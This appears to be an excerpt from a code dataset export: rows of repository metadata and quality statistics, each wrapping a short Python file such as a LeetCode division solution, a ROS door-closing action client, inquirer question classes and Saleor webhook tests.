| 14.613636 | 196 | 0.62986 | 132 | 643 | 2.954545 | 0.5 | 0.025641 | 0.030769 | 0.030769 | 0.015385 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107078 | 0.143079 | 643 | 43 | 197 | 14.953488 | 0.600726 | 0.339036 | 0 | 0 | 0 | 0 | 0.07109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e7ffb07502a866daacad535d6c162c3df47ed0fa | 1,075 | py | Python | 001-050/029-divide-two-integers.py | bbram10/leetcode-master | 565f5f0cb3c9720e59a78ddf2e5e6e829c70bac6 | [
"MIT"
] | 134 | 2017-01-16T11:17:44.000Z | 2022-03-16T17:13:26.000Z | 001-050/029-divide-two-integers.py | bbram10/leetcode-master | 565f5f0cb3c9720e59a78ddf2e5e6e829c70bac6 | [
"MIT"
] | 1 | 2019-11-18T02:10:51.000Z | 2019-11-18T02:10:51.000Z | 001-050/029-divide-two-integers.py | bbram10/leetcode-master | 565f5f0cb3c9720e59a78ddf2e5e6e829c70bac6 | [
"MIT"
] | 54 | 2017-07-17T01:24:00.000Z | 2022-02-06T05:28:44.000Z | """
STATEMENT
Divide two integers without using multiplication, division and mod operator.
CLARIFICATIONS
- Do I have to handle 32-bit integer overflow? Yes, return the MAX_INT in that case.
- Can the divisor be zero? Yes, return the MAX_INT.
EXAMPLES
34/3 -> 11
COMMENTS
- This solution is by tusizi in Leetcode (picked up from https://discuss.leetcode.com/topic/8714/clear-python-code)
"""
def divide(dividend, divisor):
    """
    Integer-divide ``dividend`` by ``divisor`` without *, / or %.

    :type dividend: int
    :type divisor: int
    :rtype: int

    Truncates toward zero (C-style). Division by zero and the
    INT_MIN / -1 overflow case both return INT_MAX, and the result is
    clamped to the signed 32-bit range.
    """
    INT_MIN, INT_MAX = -2147483648, 2147483647
    # Check the degenerate cases *before* abs(): the original tested
    # `dividend < INT_MIN and divisor == -1` after abs(), which can never
    # hold (abs values are non-negative), leaving that branch dead and
    # relying on the final clamp for the overflow case.
    if divisor == 0 or (dividend == INT_MIN and divisor == -1):
        return INT_MAX
    negative = (dividend < 0) != (divisor < 0)
    dividend, divisor = abs(dividend), abs(divisor)
    to_return = 0
    while dividend >= divisor:
        # Subtract doubling multiples of the divisor, accumulating the
        # matching power-of-two quotient bits.
        temp, i = divisor, 1
        while dividend >= temp:
            dividend -= temp
            to_return += i
            i <<= 1
            temp <<= 1
    if negative:
        to_return = -to_return
    # Clamp to the 32-bit range for out-of-range inputs.
    return min(max(INT_MIN, to_return), INT_MAX)
| 27.564103 | 115 | 0.613953 | 144 | 1,075 | 4.493056 | 0.493056 | 0.061824 | 0.037094 | 0.046368 | 0.055641 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049673 | 0.288372 | 1,075 | 38 | 116 | 28.289474 | 0.796078 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f000c275681d6eb860ca8edd89619bd04e3efa9d | 508 | py | Python | conv/setup.py | hughpyle/GW-BASIC | f0c1ef3c9655b36cd312d18e4620bb076f03afd3 | [
"MIT"
] | 26 | 2020-05-23T18:09:05.000Z | 2022-01-30T10:07:04.000Z | conv/setup.py | hughpyle/GW-BASIC | f0c1ef3c9655b36cd312d18e4620bb076f03afd3 | [
"MIT"
] | 1 | 2020-06-25T06:20:01.000Z | 2020-06-25T06:20:01.000Z | conv/setup.py | hughpyle/GW-BASIC | f0c1ef3c9655b36cd312d18e4620bb076f03afd3 | [
"MIT"
] | 4 | 2020-05-23T12:36:44.000Z | 2022-01-16T00:20:20.000Z | from setuptools import setup, find_packages
"""
https://tia.mat.br/posts/2020/06/21/converting-gwbasic-to-z80.html
"""
# Package metadata for the z80conv GW-BASIC 8086 -> Z80 conversion tool.
setup(
    name="z80conv",
    version='0.0.1',
    author="lp",
    description="Porting GW-BASIC from 8086 back to the Z80",
    license="GPLv2",
    packages=find_packages(),
    long_description="Porting GW-BASIC from 8086 back to the Z80",
    install_requires=[],
    tests_require=['pytest'],
    entry_points = {
        # Installs a `z80conv` console command mapped to z80conv.conv:main.
        'console_scripts': ['z80conv=z80conv.conv:main'],
    }
)
| 24.190476 | 66 | 0.661417 | 67 | 508 | 4.910448 | 0.701493 | 0.072948 | 0.121581 | 0.151976 | 0.273556 | 0.273556 | 0.273556 | 0.273556 | 0.273556 | 0.273556 | 0 | 0.077108 | 0.183071 | 508 | 20 | 67 | 25.4 | 0.715663 | 0 | 0 | 0 | 0 | 0 | 0.343318 | 0.057604 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f00829ce69ca21d2a75d867579f5065b5c43824d | 395 | py | Python | lib/locator/location_test.py | alt-locator/address-locator-python | 9f052dc7721223bde926723648790a17b06e9d7a | [
"MIT"
] | null | null | null | lib/locator/location_test.py | alt-locator/address-locator-python | 9f052dc7721223bde926723648790a17b06e9d7a | [
"MIT"
] | null | null | null | lib/locator/location_test.py | alt-locator/address-locator-python | 9f052dc7721223bde926723648790a17b06e9d7a | [
"MIT"
] | null | null | null | import location
import unittest
class LocationTest(unittest.TestCase):
    """Tests for location.Location JSON serialization."""

    def testToJson(self):
        # Build a Location with a nested per-interface IP mapping and
        # check that to_json() preserves both fields.
        loc = location.Location(
            name='foo',
            local_ip_address={'en0': {'local_ip_address': '1.2.3.4'}})
        as_json = loc.to_json()
        self.assertEqual(as_json['name'], 'foo')
        self.assertEqual(
            as_json['local_ip_address']['en0']['local_ip_address'],
            '1.2.3.4')
| 30.384615 | 78 | 0.698734 | 55 | 395 | 4.763636 | 0.418182 | 0.10687 | 0.21374 | 0.129771 | 0.267176 | 0.267176 | 0.267176 | 0.267176 | 0.267176 | 0.267176 | 0 | 0.02924 | 0.134177 | 395 | 12 | 79 | 32.916667 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0.197468 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f00b1f413db4083c2b4c12dfb8af15b799f387ae | 2,288 | py | Python | mtconnect/mtconnect_ros_bridge/scripts/closedoor.py | mtconnect/ros_bridge | b578e8c3edca83ea0de8ed15aff0f7733dd23e04 | [
"Apache-2.0"
] | 5 | 2015-04-30T21:51:46.000Z | 2019-03-18T06:24:38.000Z | mtconnect/mtconnect_ros_bridge/scripts/closedoor.py | CubeSpawn/ros_bridge | b578e8c3edca83ea0de8ed15aff0f7733dd23e04 | [
"Apache-2.0"
] | null | null | null | mtconnect/mtconnect_ros_bridge/scripts/closedoor.py | CubeSpawn/ros_bridge | b578e8c3edca83ea0de8ed15aff0f7733dd23e04 | [
"Apache-2.0"
] | 4 | 2016-02-21T20:04:31.000Z | 2021-01-04T13:48:41.000Z | #! /usr/bin/env python
"""
Copyright 2013 Southwest Research Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import roslib; roslib.load_manifest('mtconnect_msgs')
import rospy
# Brings in the SimpleActionClient
import actionlib
# Brings in the messages used by the material_load action.
import mtconnect_msgs.msg
def close_door_client():
    """Send a CLOSED goal to the CloseDoor action server and wait for it
    to finish, logging each step along the way.
    """
    rospy.loginfo('Launched CloseDoor Action CLient')

    # SimpleActionClient parameterized with the CloseDoorAction type.
    door_client = actionlib.SimpleActionClient(
        'CloseDoorClient', mtconnect_msgs.msg.CloseDoorAction)

    # Block until the action server is up and listening for goals.
    rospy.loginfo('Waiting for Generic Action Server')
    door_client.wait_for_server()
    rospy.loginfo('Generic Action Server Activated')

    # Goal asking the machine door to close.
    door_goal = mtconnect_msgs.msg.CloseDoorGoal()
    door_goal.close_door = 'CLOSED'
    rospy.loginfo('Sending the goal')
    door_client.send_goal(door_goal)

    # Block until the server finishes performing the action.
    rospy.loginfo('Waiting for result')
    door_client.wait_for_result()

    outcome = door_client.get_result()  # result must be a string
    rospy.loginfo('Returning the result --> %s' % outcome)
    return
if __name__ == '__main__':
    try:
        # Initializes a rospy node so that the SimpleActionClient can
        # publish and subscribe over ROS.
        rospy.init_node('CloseDoorActionClient')
        result = close_door_client()
        rospy.loginfo('Action Result --> %s' % result)
    except rospy.ROSInterruptException:
        # Parenthesized print keeps the file importable under Python 3;
        # the original bare print statement is Python-2-only syntax.
        print('program interrupted before completion')
| 34.666667 | 96 | 0.723776 | 297 | 2,288 | 5.488215 | 0.491582 | 0.051534 | 0.029448 | 0.019632 | 0.033129 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004403 | 0.205857 | 2,288 | 65 | 97 | 35.2 | 0.89268 | 0.25 | 0 | 0 | 0 | 0 | 0.254579 | 0.019231 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f00d8a2ff37a2b007fa4edfda74f6d8657793532 | 3,684 | py | Python | piton/lib/inquirer/questions.py | piton-package-manager/PPM | 19015b76184befe1e2daa63189a13b039787868d | [
"MIT"
] | 19 | 2016-04-08T04:00:07.000Z | 2021-11-12T19:36:56.000Z | piton/lib/inquirer/questions.py | LookLikeAPro/PPM | 19015b76184befe1e2daa63189a13b039787868d | [
"MIT"
] | 9 | 2017-01-03T13:39:47.000Z | 2022-01-15T20:38:20.000Z | piton/lib/inquirer/questions.py | LookLikeAPro/PPM | 19015b76184befe1e2daa63189a13b039787868d | [
"MIT"
] | 6 | 2017-04-01T03:38:45.000Z | 2021-05-06T11:25:31.000Z | # -*- coding: utf-8 -*-
"""
Module that implements the questions types
"""
import json
from . import errors
def question_factory(kind, *args, **kwargs):
    """Instantiate the concrete Question class whose ``kind`` matches.

    :raises errors.UnknownQuestionTypeError: if no class matches ``kind``.
    """
    for candidate in (Text, Password, Confirm, List, Checkbox):
        if candidate.kind == kind:
            return candidate(*args, **kwargs)
    raise errors.UnknownQuestionTypeError()
def load_from_dict(question_dict):
    """
    Load one question from a dict.
    It requires the keys 'name' and 'kind'.

    :param question_dict: mapping of Question constructor arguments;
        'kind' selects the concrete class via question_factory.
    :return: The Question object with associated data.
    :return type: Question
    """
    return question_factory(**question_dict)
def load_from_list(question_list):
    """
    Load a list of questions from a list of dicts.
    It requires the keys 'name' and 'kind' for each dict.

    :param question_list: iterable of question dicts.
    :return: A list of Question objects with associated data.
    :return type: List
    """
    return [load_from_dict(q) for q in question_list]
def load_from_json(question_json):
    """
    Load Questions from a JSON string.

    :return: A list of Question objects with associated data if the JSON
             contains a list or a Question if the JSON contains a dict.
    :return type: List or Dict
    :raises TypeError: if the decoded JSON is neither a list nor a dict.
    """
    data = json.loads(question_json)
    if isinstance(data, list):
        return load_from_list(data)
    if isinstance(data, dict):
        return load_from_dict(data)
    # Interpolate the offending type into the message: the original
    # passed it as a second constructor argument (logging style), so the
    # %s placeholder was never filled in.
    raise TypeError(
        'Json contained a %s variable when a dict or list was expected'
        % type(data))
class TaggedValue(object):
    """A choice whose display label differs from its underlying value.

    ``str()`` yields the label shown to the user, ``repr()`` yields the
    value, and equality compares by value against either another
    TaggedValue or a raw value.
    """
    def __init__(self, label, value):
        self.label = label
        self.value = value

    def __str__(self):
        return self.label

    def __repr__(self):
        return self.value

    def __cmp__(self, other):
        # Python 2 comparison hook (0 == equal); kept for backwards
        # compatibility with Python 2 callers.
        if isinstance(other, TaggedValue):
            return self.value != other.value
        return self.value != other

    def __eq__(self, other):
        # __cmp__ is ignored on Python 3, where equality silently fell
        # back to identity; spell out the same value-based semantics.
        if isinstance(other, TaggedValue):
            return self.value == other.value
        return self.value == other

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        # Consistent with __eq__ so a TaggedValue can stand in for its
        # raw value in sets and dict keys.
        return hash(self.value)
class Question(object):
    """Base class for all question types.

    Each attribute passed to the constructor may be a plain value, a
    format string referencing previous answers, or a callable taking the
    answers dict — see :meth:`_solve`.
    """
    kind = 'base question'

    def __init__(self,
                 name,
                 message='',
                 choices=None,
                 default=None,
                 ignore=False,
                 validate=True):
        self.name = name
        self.answers = {}
        self._message = message
        self._choices = choices or []
        self._default = default
        self._ignore = ignore
        self._validate = validate

    @property
    def ignore(self):
        """Whether this question should be skipped."""
        return bool(self._solve(self._ignore))

    @property
    def message(self):
        """The prompt text, resolved against current answers."""
        return self._solve(self._message)

    @property
    def default(self):
        """The default answer, resolved against current answers."""
        return self._solve(self._default)

    @property
    def choices_generator(self):
        # 2-tuples become (label, value) TaggedValues; everything else
        # passes through unchanged.
        for entry in self._solve(self._choices):
            if isinstance(entry, tuple) and len(entry) == 2:
                yield TaggedValue(*entry)
            else:
                yield entry

    @property
    def choices(self):
        """The resolved choice list."""
        return list(self.choices_generator)

    def validate(self, current):
        """Raise errors.ValidationError unless ``current`` is accepted.

        Any exception raised by a validator callable is treated the
        same as the validator returning falsy.
        """
        try:
            if self._solve(self._validate, current):
                return
        except Exception:
            pass
        raise errors.ValidationError(current)

    def _solve(self, prop, *args, **kwargs):
        # Callables receive the answers gathered so far (plus any extra
        # arguments); strings are format templates over those answers;
        # anything else is returned untouched.
        if callable(prop):
            return prop(self.answers, *args, **kwargs)
        return prop.format(**self.answers) if isinstance(prop, str) else prop
class Text(Question):
    # Free-form text input.
    kind = 'text'


class Password(Question):
    # Text input with hidden echo.
    kind = 'password'


class Confirm(Question):
    # Yes/no question; overrides the base default of None with False.
    kind = 'confirm'

    def __init__(self, name, default=False, **kwargs):
        super(Confirm, self).__init__(name, default=default, **kwargs)


class List(Question):
    # Pick exactly one entry from `choices`.
    kind = 'list'


class Checkbox(Question):
    # Pick any number of entries from `choices`.
    kind = 'checkbox'
| 24.236842 | 72 | 0.604777 | 431 | 3,684 | 5.016241 | 0.236659 | 0.022202 | 0.030065 | 0.015726 | 0.123959 | 0.068455 | 0.068455 | 0.042553 | 0.042553 | 0 | 0 | 0.000774 | 0.29886 | 3,684 | 151 | 73 | 24.397351 | 0.836237 | 0.159338 | 0 | 0.053763 | 0 | 0 | 0.034907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.182796 | false | 0.043011 | 0.021505 | 0.064516 | 0.526882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
f0123837d9cb8c6159b0ec92e3dc57d8e6054cf3 | 704 | py | Python | services/web/apps/main/pool/views.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | services/web/apps/main/pool/views.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | services/web/apps/main/pool/views.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# main.pool application
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.lib.app.extdocapplication import ExtDocApplication
from noc.main.models.pool import Pool
from noc.core.translation import ugettext as _
class PoolApplication(ExtDocApplication):
    """
    CRUD application exposing main.Pool documents in the web UI.
    """
    # Window title shown in the UI.
    title = _("Pool")
    # Menu placement: Setup > Pools.
    menu = [_("Setup"), _("Pools")]
    # Document model served by this application.
    model = Pool
    # Icon glyph used in the UI.
    glyph = "database"
    default_ordering = ["name"]
| 28.16 | 71 | 0.473011 | 57 | 704 | 5.754386 | 0.701754 | 0.064024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014925 | 0.143466 | 704 | 24 | 72 | 29.333333 | 0.529022 | 0.492898 | 0 | 0 | 0 | 0 | 0.077844 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
f013b73782802e7be9ad94ff6ab1e1a0a57d6410 | 1,224 | py | Python | saleor/app/tests/test_models.py | fairhopeweb/saleor | 9ac6c22652d46ba65a5b894da5f1ba5bec48c019 | [
"CC-BY-4.0"
] | 15,337 | 2015-01-12T02:11:52.000Z | 2021-10-05T19:19:29.000Z | saleor/app/tests/test_models.py | fairhopeweb/saleor | 9ac6c22652d46ba65a5b894da5f1ba5bec48c019 | [
"CC-BY-4.0"
] | 7,486 | 2015-02-11T10:52:13.000Z | 2021-10-06T09:37:15.000Z | saleor/app/tests/test_models.py | aminziadna/saleor | 2e78fb5bcf8b83a6278af02551a104cfa555a1fb | [
"CC-BY-4.0"
] | 5,864 | 2015-01-16T14:52:54.000Z | 2021-10-05T23:01:15.000Z | from ...app.models import App
from ...webhook.event_types import WebhookEventType
def test_qs_for_event_type(payment_app):
    """An active app with payment permission is returned for the event."""
    apps = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
    assert len(apps) == 1
    assert apps[0] == payment_app
def test_qs_for_event_type_no_payment_permissions(payment_app):
    """An app stripped of its payment permission is excluded."""
    payment_app.permissions.first().delete()
    apps = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
    assert len(apps) == 0
def test_qs_for_event_type_inactive_app(payment_app):
    """A deactivated app must not be returned for the event type."""
    payment_app.is_active = False
    payment_app.save()
    apps = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
    assert len(apps) == 0
def test_qs_for_event_type_no_webhook_event(payment_app):
    """Removing the PAYMENT_AUTHORIZE event excludes the app."""
    webhook = payment_app.webhooks.first()
    authorize_event = webhook.events.filter(
        event_type=WebhookEventType.PAYMENT_AUTHORIZE
    ).first()
    authorize_event.delete()
    apps = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
    assert len(apps) == 0
def test_qs_for_event_type_inactive_webhook(payment_app):
    """An app whose webhook is deactivated is excluded."""
    webhook = payment_app.webhooks.first()
    webhook.is_active = False
    webhook.save()
    apps = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
    assert len(apps) == 0
| 32.210526 | 88 | 0.768791 | 172 | 1,224 | 5.116279 | 0.186047 | 0.1125 | 0.136364 | 0.218182 | 0.6875 | 0.640909 | 0.617045 | 0.497727 | 0.497727 | 0.497727 | 0 | 0.005671 | 0.135621 | 1,224 | 37 | 89 | 33.081081 | 0.826087 | 0 | 0 | 0.407407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.185185 | false | 0 | 0.074074 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.